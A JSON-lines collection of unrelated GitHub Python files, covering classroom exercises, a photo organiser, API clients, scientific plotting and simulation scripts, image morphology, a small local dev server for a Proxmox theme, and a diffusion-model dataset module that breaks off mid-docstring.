+{"seq_id":"42948940811","text":"#Author: Sam Allan\n#Date of Last Revision: 05/20/2023\n#Script: Seattle Ops 301n3 challenge 09\n#Purpose: Create if statements using these logical conditionals below. Each statement should print information to the screen depending on if the condition is met.\n#!Equals: a == b\n#!Not Equals: a != b\n#!Less than: a < b\n#!Less than or equal to: a <= b\n#!Greater than: a > b\n#!Greater than or equal to: a >= b\n#!Create an if statement using a logical conditional of your choice and include elif keyword that executes when other conditions are not met.\n#!Create an if statement that includes both elif and else to execute when both if and elif are not met.\n#Stretch Goals (Optional Objectives)\n#Pursue stretch goals if you are a more advanced user or have remaining lab time.\n#!Create an if statement with two conditions by using and between conditions.\n#!Create an if statement with two conditions by using or between conditions.\n#!Create a nested if statement.\n#Create an if statement that includes pass to avoid errors.\n\n#Variables:\n#sit, storing where the user is sitting as an argument when the function is called.\n#chairs, storing the number of chairs the user has sat in as an integer in a variable.\n\n# MAIN\n#defining function sit_finder to try to find where you are sitting. It can only verify whether or not the user is sitting in a chair.\ndef sit_finder(sit):\n#if the user is sitting in a chair\n if sit == \"chair\":\n #give them a helpful reminder.\n print(\"you're sitting in a chair!\")\n #return the value true to be used later.\n return True\n #else, if they're sitting in something that does not equal a chair\n elif sit != \"chair\":\n #despair\n print(\"where on earth are you sitting?!\")\n #return False value to be used later\n return False\n#defining chair_number function to find how many chairs the user has sat in\ndef chair_number(chairs):\n #if they try to say a word instead of a number\n if isinstance(chairs, str):\n #feign confusion\n print(\"I don't know what you're talking about\")\n #return a 0 integer to be used when the function is called later.\n return 0\n #else if they've sat in fewer than 3 chairs\n elif chairs <= 3:\n #chastise them\n print(\"somebody loves standing\")\n #if they've sat in fewer than 20 chairs\n elif chairs < 20:\n #scold them\n print(\"that's not that many chairs\")\n #if it's greater than 90 chairs\n elif chairs >= 90:\n #make fun of the user\n print(\"whoa, ok, slow down chairmaster\")\n #if it's greater than 50 chairs\n elif chairs > 50:\n #be impressed\n print(\"whoa, buddy, that's a lot of chairs\")\n #if it's fewer than or equal to 50, unless one of the above conditions has already been met\n elif chairs <= 50:\n #be unimpressed\n print(\"ok, pretty average amount of chairs\")\n #otherwise\n else:\n #forget the topic\n print(\"I forgot what we were talking about.\")\n #return the integer value given by any of these conditions that is set off to the variable \"chairs\"\n return chairs\n#calling the function within a variable, asking for user input in the argument.\nsit = sit_finder(input(\"where are you sitting?\"))\n#storing user input in a variable to be used as an argument when the num_chairs function is called\nuser_input = input(\"how many chairs have you sat in?\")\n#if the contents of the user_input variable is a string, attempt to convert it to an integer. \ntry:\n user_input = int(user_input)\nexcept ValueError:\n # If the conversion fails, user_input will remain a string\n pass\n\n#setting another variable to house the function for use in the following two lines\nnum_chairs = chair_number(user_input)\n\n#if they have sat in more than 50 chairs and are currently sitting in a chair\nif num_chairs > 50 and sit:\n #deliver a helpful reminder.\n print(\"you are sitting in a chair, and have sat in more than 50 chairs.\")\n#if the number of chairs they've sat in is equal to 420 or 69\nif num_chairs == 420 or num_chairs == 69:\n #let them know they've been caught.\n print(\"I see what you did there.\")\n\n#if the number of chairs exceeds 1000 \nif num_chairs > 1000:\n #setting a variable to hold the method by which the user sat in so many chairs\n yikes = input(\"how on earth have you sat in so many chairs\")\n #try to see if their input was an integer\n try:\n # if it is an integer, it will be recognized as such henceforth.\n yikes = int(yikes)\n #setting variable to hold an explanation\n varibul = input(\"what are you talking about?\")\n #check to see if their explanation is an integer\n try:\n #if it is, it shall remain that way\n varibul = int(varibul)\n #let the user know you don't understand what's happening.\n print(\"you're insane.\")\n #if int conversion returns valueError(basically, if the input was a string)\n except ValueError:\n #accept explaination\n print(\"ok, I see what you mean.\")\n #same deal here, if the input was a string\n except ValueError:\n #if it is this specific string\n if yikes == \"chairs\":\n #diagnose the user\n print(\"you're insane.\")\n #if it is any other string\n else:\n #feign suspicion\n print (\"sus.\")\n#if number of chairs is less than 50 and the user is not sitting in a chair\nif num_chairs <50 and not sit:\n #go nuts\n print(\"wowowowowowowowowow\")\n #just trying to fit a pass in here somewhere.\nelse:\n pass\n\n# END","repo_name":"theSam1998/Seattle-Ops-301n3-Challenges","sub_path":"OpsChal09.py","file_name":"OpsChal09.py","file_ext":"py","file_size_in_byte":5612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"27632904044","text":"import pandas as pd\nimport numpy as np\nimport os\nimport datetime\nimport shutil\nimport sys\n\n# ---- define the file paths\npackage_root = os.path.dirname(os.path.abspath(''))\nlibrary = os.path.join(package_root, 'photo_libraries')\n\n# ---- get database\ndf = pd.read_hdf(os.path.abspath('photo_database.h5'), 'input')\nif 'datetime' not in df.columns:\n raise Exception('database does not contain image metadata')\n\n# ---- check that the dates are valid\ncheck_dt = df[pd.notnull(df.datetime)]\ninvalid_dt = check_dt[(check_dt.datetime > datetime.datetime.today()) |\n (check_dt.datetime < datetime.datetime.utcfromtimestamp(0))].index\ndf.loc[invalid_dt, 'datetime'] = np.nan\n\n# ---- create the photo archive folder\nroot = os.path.join(package_root, 'photo_archive')\ntry:\n os.mkdir(os.path.join(root))\n print('created photo archive')\nexcept FileExistsError:\n pass\n\n# ---- create folders for files that do not have metadata\nfor file_type in df.file_type.unique():\n try:\n os.mkdir(os.path.join(root, file_type))\n print('created sub-folder for {}'.format(file_type))\n except FileExistsError:\n pass\n\n# ---- create folder for images that do no have metadata\ntry:\n os.mkdir(os.path.join(root, 'image', 'unknown'))\n print('created sub-folder for images without metadata')\nexcept FileExistsError:\n pass\n\n# ---- create folders for each unique year:\nif df.datetime.notnull().any():\n for year in df.datetime.dt.year.unique():\n if pd.notnull(year):\n try:\n os.mkdir(os.path.join(root, 'image', str(int(year))))\n print('created sub-folder: {}'.format(str(int(year))))\n except FileExistsError:\n pass\n\n# ---- create destination codes\ndef create_destinations(df):\n seed_since_epoch = int((datetime.datetime.now() - datetime.datetime.utcfromtimestamp(0)).total_seconds())\n rng = np.random.RandomState(seed_since_epoch)\n\n df['img_id'] = ['img_id_'+str(i).zfill(10) for i in rng.randint(0,1e10, len(df))]\n df['file_name'] = [df.filepath.loc[i][df.filepath.loc[i].rfind('/')+1:] for i in df.filepath.index]\n\n if df.datetime.notnull().any():\n df['file_name'] = np.where(pd.notnull(df.datetime), 'date_'+df.datetime.dt.strftime('%Y%m%d') + '_' + df.img_id + df.file_ext.str.lower(), df.file_name)\n\n destination = []\n for i in df.index:\n if pd.isnull(df.loc[i, 'datetime']):\n if df.loc[i, 'file_type'] == 'image':\n destination.append(os.path.join(root, df.loc[i, 'file_type'], 'unknown', df.loc[i, 'file_name']))\n else:\n destination.append(os.path.join(root, df.loc[i, 'file_type'], df.loc[i, 'file_name']))\n else:\n destination.append(os.path.join(root, df.loc[i, 'file_type'], df.loc[i, 'datetime'].strftime('%Y'), df.loc[i, 'file_name']))\n df['destination'] = destination\n return df\n\n\n# ---- function to move the file\ndef move_file(idx, df):\n try:\n shutil.move(df.loc[idx,'filepath'], df.loc[idx, 'destination'])\n\n except PermissionError:\n raise PermissionError('permission error moving {} to {}'\\\n .format(df.loc[idx, 'filepath'], df.loc[idx, 'destination']))\n return\n\n\n# ---- function to check for duplicate names and add DUPLICATE if it is\ndef check_for_duplicate_file_name(idx, df):\n i = 1\n while os.path.exists(df.loc[idx, 'destination']):\n if pd.isnull(df.loc[idx, 'datetime']):\n if df.loc[idx, 'file_type'] == 'image':\n df.loc[idx, 'destination'] = os.path.join(root, df.loc[idx, 'file_type'],\n 'unknown', 'DUPLICATE{}_'.format(i) + df.loc[idx, 'file_name'])\n else:\n df.loc[idx, 'destination'] = os.path.join(root, df.loc[idx, 'file_type'],\n 'DUPLICATE{}_'.format(i) + df.loc[idx, 'file_name'])\n else:\n df.loc[idx, 'destination'] = os.path.join(root, df.loc[idx, 'file_type'],\n df.loc[idx, 'datetime'].strftime('%Y'),\n 'DUPLICATE{}_'.format(i) + df.loc[idx, 'file_name'])\n i += 1\n return df\n\n\n# ---- bring together the two functions above to move all of the images\ndef organize_files(df):\n for idx in df.index:\n # ---- make sure that the source file exists\n if not os.path.exists(df.loc[idx, 'filepath']):\n raise Exception('source file {} does not exist'.format(df.loc[idx, 'filepath']))\n else:\n df = check_for_duplicate_file_name(idx, df)\n move_file(idx, df)\n return df\n\n\ndf = create_destinations(df)\ndf = organize_files(df)\ndf.to_hdf('photo_database.h5', 'output')\n","repo_name":"alexdsbreslav/photo_organization","sub_path":"scripts/organize_files.py","file_name":"organize_files.py","file_ext":"py","file_size_in_byte":4799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"36273302500","text":"\"\"\"\nSession object used to maintain an open session with PTP\n\nAlmost entirely based off of session by kannibalox from their PTPAPI project on GitHub\n\nAuthor: Parker Timmerman\n\"\"\"\n\nimport logging\nimport requests\n\nfrom ptp_config import config\nfrom time import time, sleep\n\nLOGGER = logging.getLogger(__name__)\n\nclass TokenSession(requests.Session):\n \"\"\" Allow rate-limiting requests to a site \"\"\"\n\n def __init__(self, capacity, fill_rate):\n \"\"\" tokens is the total number of tokens in the bucket\n fill_rate is the rate in tokens/second that the bucket will be refilled.\n A request can be made when there are enough tokens in the bucket for the request \"\"\"\n\n requests.Session.__init__(self)\n self.capacity = float(capacity)\n self._tokens = float(capacity) # current tokens in bucket, start at capacity (full)\n self.consumed_tokens = 0\n self.fill_rate = float(fill_rate)\n self.timestamp = time()\n\n def consume(self, tokens):\n \"\"\" Consume tokens from the bucket. Returns True if there were enough tokens, otherwise False. \"\"\"\n\n self.update_tokens()\n if tokens < self._tokens:\n self._tokens -= tokens\n self.consumed_tokens += tokens\n LOGGER.debug(\"Consuming {0} token(s), total tokens consumed so far: {1}\".format(tokens, self.consumed_tokens))\n else:\n return False\n return True\n\n def request(self, *args, **kwargs):\n while not self.consume(1):\n LOGGER.debug(\"Waiting for token bucket to refull...\")\n sleep(1)\n return requests.Session.request(self, *args, **kwargs)\n\n def update_tokens(self):\n if self._tokens < self.capacity:\n now = time()\n delta = self.fill_rate * (now - self.timestamp)\n self._tokens = min(self.capacity, self._tokens + delta)\n self.timestamp = now\n return self._tokens\n\n tokens = (update_tokens)\n\n def base_get(self, url_path, *args, **kwargs):\n return self.get(config.get('Main', 'baseURL') + url_path, *args, **kwargs)\n\n def base_post(self, url_path, *args, **kwargs):\n return self.post(config.get('Main', 'baseURL') + url_path, *args, **kwargs)\n\nLOGGER.debug(\"Initializing token session\")\nsession = TokenSession(3, 0.5)\nsession.headers.update({\"User-Agent\": \"Wget/1.13.4\"})\n","repo_name":"ParkMyCar/MovieManSpiff","sub_path":"ptp_api/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"18183014651","text":"\nimport json\nimport requests\n\nimport settings\nfrom constants import transactino_constants, model_constants, method_constants\nfrom util.input_args import input_args\nfrom util.get_path import get_path\nfrom util.make_headers import make_headers\nfrom util.check_for_announcements import check_for_announcements\n\nfrom .constants import subscription_constants\n\ndef activate(args):\n activate_args = input_args({\n subscription_constants.SUBSCRIPTION_ID: {\n method_constants.INPUT: 'Enter the Subscription ID to activate',\n method_constants.TYPE: str,\n },\n })\n\n payload = {\n transactino_constants.SCHEMA: {\n model_constants.MODELS: {\n model_constants.SUBSCRIPTION: {\n method_constants.METHODS: {\n subscription_constants.ACTIVATE: activate_args,\n },\n },\n },\n },\n }\n\n response = requests.post(\n settings.URL,\n headers=make_headers(),\n data=json.dumps(payload),\n )\n\n check_for_announcements(response)\n\n response_json = json.loads(response.text)\n activate_json = get_path(response_json, [\n transactino_constants.SCHEMA,\n model_constants.MODELS,\n model_constants.SUBSCRIPTION,\n method_constants.METHODS,\n subscription_constants.ACTIVATE,\n ])\n\n print(json.dumps(activate_json, indent=2))\n","repo_name":"NicholasPiano/transactino","sub_path":"jormungand/commands/subscription/activate.py","file_name":"activate.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"74277809927","text":"#!/usr/bin/env python\n# AUTHOR: William Stafford Noble\n# CREATE DATE: 16 March 2009\nimport sys\nimport os\nimport math\n\nusage = \"\"\"USAGE: make-qq-plot.py \n\nCompare a given set of p-values to the uniform distribution by\ncreating a QQ plot with log-log axes. The program outputs three\nfiles: a gnuplot script (.gnuplot), the data to be plotted\n(.txt) and the plot itself (.png). Note that the stored\nvalues are downsampled to avoid having too many points in the plot.\n\n\nOptions:\n --no-log-scale\n --column-header Header of column from which to get p-values.\n --minus-natural-log Input values are negative log base e.\n --format png|eps (default=png)\n --fontsize (only effective with \"-format eps\")\n --title \n\nIf the p-value file is specified as \"-\", then the program reads from\nstandard input.\n\n\"\"\"\n\n###############################################################################\n# Find a given word in a tab-delimited string of words.\n# Return the index.\ndef findWord(header, word):\n\n words = header.split(\"\\t\")\n for index in range(0, len(words)):\n if (words[index] == word):\n return(index)\n sys.stderr.write(\"Can't find %s in %s.\\n\" % (word, header))\n sys.exit(1)\n\n###############################################################################\n# MAIN\n###############################################################################\n\n# Set default values.\nlog_scale = 1\ncolumn_header = \"\"\nlog_values = 0\nfile_format = \"png\"\nfont_size = 24\ntitle = \"\"\n\n# Parse the command line.\nsys.argv = sys.argv[1:]\nwhile (len(sys.argv) > 2):\n next_arg = sys.argv[0]\n sys.argv = sys.argv[1:]\n if (next_arg == \"--no-log-scale\"):\n log_scale = 0\n elif (next_arg == \"--column-header\"):\n column_header = sys.argv[0]\n sys.argv = sys.argv[1:]\n elif (next_arg == \"--minus-natural-log\"):\n log_values = 1\n elif (next_arg == \"--format\"):\n file_format = sys.argv[0]\n sys.argv = sys.argv[1:]\n elif (next_arg == \"--fontsize\"):\n font_size = int(sys.argv[0])\n sys.argv = sys.argv[1:]\n elif (next_arg == \"--title\"):\n title = sys.argv[0]\n sys.argv = sys.argv[1:]\n else:\n sys.stderr.write(\"Invalid option (%s).\\n\" % next_arg)\n sys.exit(1)\nif (len(sys.argv) != 2):\n sys.stderr.write(usage)\n sys.exit(1)\npvalue_filename = sys.argv[0]\nfileroot = sys.argv[1]\n\n# Open the file for reading.\nif (pvalue_filename == \"-\"):\n pvalue_file = sys.stdin\nelse:\n pvalue_file = open(pvalue_filename, \"r\")\n\n# If a header string was specified, find the relevant column.\nif (column_header != \"\"):\n header = pvalue_file.readline().rstrip()\n column_index = findWord(header, column_header)\n sys.stderr.write(\"Reading p-values from column %d.\\n\" % column_index)\nelse:\n column_index = 0\n\n# Read the p-values from the specified column.\npvalues = []\nnumZeroes = 0\nfor line in pvalue_file:\n line = line.rstrip()\n words = line.split(\"\\t\")\n\n # Skip comment lines.\n if (line[0] == \"#\"):\n continue\n\n # Crash if the line is too short.\n if (len(words) <= column_index):\n sys.stderr.write(\"Too few columns (%d < %d).\\n%s\\n\" \n % (len(words), column_index, line))\n sys.exit(1)\n\n # Skip NaNs.\n if ((words[column_index] == \"NaN\") or\n (words[column_index] == \"nan\")):\n continue\n\n pvalue = float(words[column_index])\n if (log_values):\n pvalue = math.exp(-1.0 * pvalue)\n\n # Count zero p-values.\n if (pvalue == 0):\n numZeroes += 1\n\n # Store this p-value.\n pvalues.append(pvalue)\n\npvalue_file.close()\nnum_pvalues = len(pvalues)\nif (numZeroes != 0):\n sys.stderr.write(\"Warning: Found %d zero p-values.\\n\" % numZeroes)\nsys.stderr.write(\"Read %d p-values from %s.\\n\" % (num_pvalues, \n pvalue_filename))\n\n# Sort the values.\npvalues.sort()\n\n# Open the data file.\ndata_filename = \"%s.txt\" % fileroot\ndata_file = open(data_filename, \"w\")\nsys.stderr.write(\"Creating %s.\\n\" % data_filename)\n\n# We will only print with this density along the x-axis.\nif (log_scale):\n increment = 0.01\nelse:\n increment = 0.001\ncurrent_value = 0\n\n# Print the values to a file.\nrank = 1.0\nnum_printed = 0\nfor pvalue in pvalues:\n\n if (log_scale):\n new_value = math.log(rank / num_pvalues)\n else:\n new_value = rank / num_pvalues\n\n if (current_value == 0) or (new_value >= current_value + increment):\n data_file.write(\"%g\\t%g\\n\" % (rank / num_pvalues, pvalue))\n current_value = new_value\n num_printed += 1\n\n rank += 1.0\ndata_file.close()\nsys.stderr.write(\"Printed %d p-values.\\n\" % num_printed)\n\n# Find the first non-zero p-value.\nfor index in range(0, len(pvalues)):\n min_pvalue = pvalues[index]\n if (min_pvalue != 0):\n break\n\n# Set the range.\nsys.stderr.write(\"Minimum p-value=%g\\n\" % min_pvalue)\nif (1.0 / num_pvalues < min_pvalue):\n min_pvalue = 1.0 / num_pvalues\n sys.stderr.write(\"Minimum rank p-value=%g\\n\" % min_pvalue)\nif (min_pvalue == 0):\n min_value = \"1e-10\"\nelse:\n min_value = \"1e%d\" % (int(math.log(min_pvalue, 10.0)) - 1)\nsys.stderr.write(\"Minimum x-axis value=%s\\n\" % min_value)\n\n# Open the gnuplot file.\ngnuplot_filename = \"%s.gnuplot\" % fileroot\ngnuplot_file = open(gnuplot_filename, \"w\")\nsys.stderr.write(\"Creating %s.\\n\" % gnuplot_filename)\n\n# Print the gnuplot file.\ngnuplot_file.write(\"set output '/dev/null'\\n\")\nif (file_format == \"png\"):\n gnuplot_file.write(\"set terminal png\\n\")\nelif (file_format == \"eps\"):\n gnuplot_file.write(\"set terminal postscript eps %s\\n\" % font_size)\nelse:\n sys.stderr.write(\"Invalid file format (%s).\\n\" % file_format)\n sys.exit(1)\ngnuplot_file.write(\"set xlabel 'Rank p-value'\\n\")\ngnuplot_file.write(\"set ylabel 'Calculated p-value'\\n\")\ngnuplot_file.write(\"set xrange [%s:1]\\n\" % min_value)\ngnuplot_file.write(\"set yrange [%s:1]\\n\" % min_value)\nif (log_scale):\n gnuplot_file.write(\"set logscale xy\\n\")\nif (title != \"\"):\n gnuplot_file.write(\"set title '%s'\\n\" % title)\ngnuplot_file.write(\"plot x notitle with lines lt 1\\n\")\ngnuplot_file.write(\"replot 0.5*x notitle with lines lt 2\\n\")\ngnuplot_file.write(\"replot 2.0*x notitle with lines lt 2\\n\")\ngnuplot_file.write(\"replot '%s' notitle with points\\n\" % data_filename)\ngnuplot_file.write(\"set output\\n\")\ngnuplot_file.write(\"replot\\n\")\ngnuplot_file.close()\n\n# Make the image.\nsys.stderr.write(\"Creating %s.%s.\\n\" % (fileroot, file_format))\nos.system(\"gnuplot %s > %s.%s\" % (gnuplot_filename, fileroot, file_format))\n\n","repo_name":"crux-toolkit/crux-toolkit","sub_path":"test/calibration/make-qq-plot.py","file_name":"make-qq-plot.py","file_ext":"py","file_size_in_byte":6397,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"16"}
+{"seq_id":"24066709177","text":"def process(arr, left, right):\r\n \r\n if left == right:\r\n return\r\n \r\n mid = left + int((right-left)>>1)\r\n process(arr, left, mid)\r\n process(arr, mid + 1, right)\r\n merge(arr, left, mid, right)\r\n\r\n\r\n\r\ndef merge(arr, left, mid, right):\r\n \r\n help_list = [0] * (right-left+1)\r\n \r\n i = 0\r\n left_index = left\r\n right_index = mid + 1\r\n \r\n while left_index <= mid and right_index <= right:\r\n if arr[left_index] < arr[right_index]:\r\n help_list[i] = arr[left_index]\r\n left_index += 1\r\n else:\r\n help_list[i] = arr[right_index]\r\n right_index += 1\r\n i += 1\r\n while left_index <= mid:\r\n help_list[i] = arr[left_index]\r\n left_index += 1\r\n i += 1\r\n while right_index <= right:\r\n help_list[i] = arr[right_index]\r\n right_index += 1\r\n i += 1\r\n \r\n for i in range(right-left+1):\r\n arr[left+i] = help_list[i]\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n arr = list(range(20))\r\n\r\n import random\r\n random.shuffle(arr)\r\n print(arr)\r\n\r\n process(arr, 0, len(arr)-1)\r\n print(arr)\r\n\r\n# [4, 10, 8, 16, 17, 3, 13, 9, 15, 7, 14, 18, 11, 2, 5, 6, 1, 12, 19, 0]\r\n# [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19]\r\n","repo_name":"iubizi/014-merge-sort","sub_path":"merge sort.py","file_name":"merge sort.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71426528969","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\n\n##### PARAMETERS #####\n\nTf = 100000 # Final time - seconds\nm = 1 # Particle mass\ngamma = 2 # Friction\nkb = 1 # Boltzmann cte = 1 for simplicity\nT = 300 # [k] - Temperature\n\n\n###### Discrete time\nt = np.linspace(0, 1000, num = Tf)\ndt = t[2]-t[1]\n\n###### Noise\naux = np.zeros(Tf) # auxiliar array of the right size\n\n# Function to create random numbers\nRandom = lambda n: np.random.normal(loc=0.0, scale=1.0) # Generate random number\nMapRandom = map(Random,aux)\n\n# Array of Noise\neta = np.sqrt(2*kb*T*gamma)*np.array(list(MapRandom)) # eta(t)\n\n###### Initial position and velocity\n\nx0 = 0 \nv0 = 0 \n\n###### Arrays of position and velocities\n\nx = np.zeros(1)\nx[0] = x0\nv = np.zeros(1)\nv[0] = v0\n\n###### Discrete Langevin Equation\n\ni = 1\nwhile i < Tf:\n v = np.append(v, ((dt/m)*eta[i]+v[i-1])/(1+(dt/m)*gamma))\n x = np.append(x, x[i-1] + v[i]*dt)\n i+=1\nfig, (left, right) = plt.subplots(1, 2, figsize=(15,5))\n\nright.plot(t, x)\nleft.plot(t, v)\n\nfig.suptitle('1-D Броуновское движение', fontsize=20)\nright.set(xlabel = \"Время, с\", ylabel = \"x(t)\")\nleft.set(xlabel = \"Время, с\", ylabel = \"v(t)\")\n\nright.set_xlim([0, 1000]);\nleft.set_xlim([0, 1000]);\nplt.show()\n\n\n","repo_name":"chu412/Physical-modelling","sub_path":"Тема_Статистическая физика/brownian_motion_2.py","file_name":"brownian_motion_2.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"36577291335","text":"import cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\ndef main():\n img = cv2.imread('2.jpg', 0)\n _, thresh = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY)\n # erosion\n kernel = np.ones((11, 11), np.uint8)\n erosion = cv2.erode(thresh, kernel, iterations=1)\n # dilation\n dilation = cv2.dilate(thresh, kernel, iterations=1)\n # Opening\n opening = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel)\n # Closing\n closing = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel)\n # Display Images\n plt.subplot(321), plt.imshow(img, cmap = 'gray'), plt.axis('off')\n plt.title('Original Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(322),plt.imshow(thresh, cmap = 'gray')\n plt.title('Binary Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(323),plt.imshow(erosion, cmap = 'gray')\n plt.title('Eroded Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(324),plt.imshow(dilation, cmap = 'gray')\n plt.title('Dilated Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(325),plt.imshow(opening, cmap = 'gray')\n plt.title('Opening Image'), plt.xticks([]), plt.yticks([])\n plt.subplot(326),plt.imshow(closing, cmap = 'gray')\n plt.title('Closing Image'), plt.xticks([]), plt.yticks([])\n plt.show()\n\nif __name__ == '__main__':\n main()","repo_name":"himanshuMaheshwari2311/Image-Processing-Lab","sub_path":"image-morphology/morphological_operation.py","file_name":"morphological_operation.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"8937971730","text":"def factorial(n):\n if n == 0:\n return 1.0\n else:\n return n * factorial(n-1)\n\n\ndef taylor_exp(n):\n return [1.0/factorial(i) for i in range(n)]\n\n\ndef taylor_sin(n):\n res = []\n for i in range(n):\n if i % 2 == 1:\n res.append((-1)**((i-1)/2)/float(factorial(i)))\n else:\n res.append(0.0)\n return res\n\n\ndef benchmark():\n taylor_exp(500)\n taylor_sin(500)\n\n\nif __name__ == '__main__':\n benchmark()\n #python -m cProfile -o prof.out taylor.py\n #pyprof2calltree -i prof.out -o prof.calltree\n #kcachegrind prof.calltree # or qcachegrind prof.calltree\n #you can use instructions at https://github.com/rkern/line_profiler. kernprof.py -l -v simul.py","repo_name":"andrey-ladygin-loudclear/deep-learning","sub_path":"helper/factorial/taylor.py","file_name":"taylor.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"1387060843","text":"# Script to assist with PVEDiscordDark development\r\n#\r\n# By default serves HTTP on port 3000, any *.js request gets the JS script, any *.css request gets the CSS file and any image request gets corresponding image\r\n# Meant to be used with the \"Requestly\" browser extension to redirect PVEDD requests from PVE server to localhost:3000\r\n#\r\n\r\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\r\nimport json\r\nimport os\r\n\r\nPORT = 3000\r\nDIR_SASS = os.path.join(os.path.dirname(__file__), \"sass\")\r\nDIR_IMAGES = os.path.join(os.path.dirname(__file__), \"images\")\r\nDIR_JS = os.path.join(os.path.dirname(__file__), \"js\")\r\n\r\n\r\nclass Server(BaseHTTPRequestHandler):\r\n def log_message(self, format, *args):\r\n return\r\n\r\n def _set_headers(self, status, type):\r\n self.send_response(status)\r\n self.send_header(\"Content-type\", type)\r\n self.end_headers()\r\n\r\n def do_GET(self):\r\n status = 200\r\n type = \"application/json\"\r\n data = None\r\n\r\n file = self.path.rpartition(\"/\")[2]\r\n ext = file.rpartition(\".\")[2]\r\n\r\n if ext == \"css\":\r\n data = open(os.path.join(DIR_SASS, \"PVEDiscordDark.css\"), \"rb\").read()\r\n type = \"text/css\"\r\n elif ext == \"js\":\r\n data = open(os.path.join(DIR_JS, \"PVEDiscordDark.js\"), \"rb\").read()\r\n type = \"application/javascript\"\r\n elif ext == \"png\" or ext == \"jpg\" or ext == \"jpeg\":\r\n try:\r\n data = open(os.path.join(DIR_IMAGES, file), \"rb\").read()\r\n type = f\"image/{ext}\"\r\n except FileNotFoundError:\r\n status = 404\r\n elif ext == \"svg\":\r\n try:\r\n data = open(os.path.join(DIR_IMAGES, file), \"rb\").read()\r\n type = f\"image/svg+xml\"\r\n except FileNotFoundError:\r\n status = 404\r\n else:\r\n status = 400\r\n self._set_headers(status, type)\r\n if status == 200:\r\n self.wfile.write(data)\r\n else:\r\n self.wfile.write(json.dumps({\"error\": status}).encode())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(f\"Serving on localhost:{PORT}\")\r\n server = HTTPServer(server_address=(\"\", PORT), RequestHandlerClass=Server)\r\n try:\r\n server.serve_forever()\r\n except KeyboardInterrupt:\r\n quit()\r\n","repo_name":"Weilbyte/PVEDiscordDark","sub_path":"PVEDiscordDark/serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"16"}
+{"seq_id":"74164189127","text":"from torch.utils.data import Dataset\nfrom torchvision import datasets\nimport torchvision.transforms as transforms\nimport numpy as np\nimport torch\nimport math\nimport random\nfrom PIL import Image\nimport os\nimport glob\nimport einops\nimport torchvision.transforms.functional as F\n\n\nclass UnlabeledDataset(Dataset):\n def __init__(self, dataset):\n self.dataset = dataset\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, item):\n data = tuple(self.dataset[item][:-1]) # remove label\n if len(data) == 1:\n data = data[0]\n return data\n\n\nclass LabeledDataset(Dataset):\n def __init__(self, dataset, labels):\n self.dataset = dataset\n self.labels = labels\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, item):\n return self.dataset[item], self.labels[item]\n\n\nclass CFGDataset(Dataset): # for classifier free guidance\n def __init__(self, dataset, p_uncond, empty_token):\n self.dataset = dataset\n self.p_uncond = p_uncond\n self.empty_token = empty_token\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, item):\n x, label = self.dataset[item]\n y = 0\n if type(label) == np.ndarray: # If need to keep the label\n if label[1] == 1: # if label[1] == 1, this is a true label or high confidence prediction, Keep labels\n y = label[0]\n elif label[1] != 0: # for exp6\n if random.random() < self.p_uncond * (1-label[1]):\n y = self.empty_token\n else:\n y = label[0]\n elif random.random() < self.p_uncond: # set label none with probability p_uncond\n y = self.empty_token\n else: # keep the label if not set to none\n y = label[0]\n\n else: # if label is not a numpy array, then we don't need to keep labels\n if random.random() < self.p_uncond:\n y = self.empty_token\n else:\n y = label\n\n return x, np.int64(y)\n\n\nclass DatasetFactory(object):\n\n def __init__(self):\n self.train = None\n self.test = None\n\n def get_split(self, split, labeled=False):\n if split == \"train\":\n dataset = self.train\n elif split == \"test\":\n dataset = self.test\n else:\n raise ValueError\n\n if self.has_label:\n return dataset if labeled else UnlabeledDataset(dataset)\n else:\n assert not labeled\n return dataset\n\n def unpreprocess(self, v): # to B C H W and [0, 1]\n v = 0.5 * (v + 1.)\n v.clamp_(0., 1.)\n return v\n\n @property\n def has_label(self):\n return True\n\n @property\n def data_shape(self):\n raise NotImplementedError\n\n @property\n def data_dim(self):\n return int(np.prod(self.data_shape))\n\n @property\n def fid_stat(self):\n return None\n\n def sample_label(self, n_samples, device):\n raise NotImplementedError\n\n def label_prob(self, k):\n raise NotImplementedError\n\n\n# CIFAR10\n\nclass CIFAR10(DatasetFactory):\n r\"\"\" CIFAR10 dataset\n\n Information of the raw dataset:\n train: 50,000\n test: 10,000\n shape: 3 * 32 * 32\n 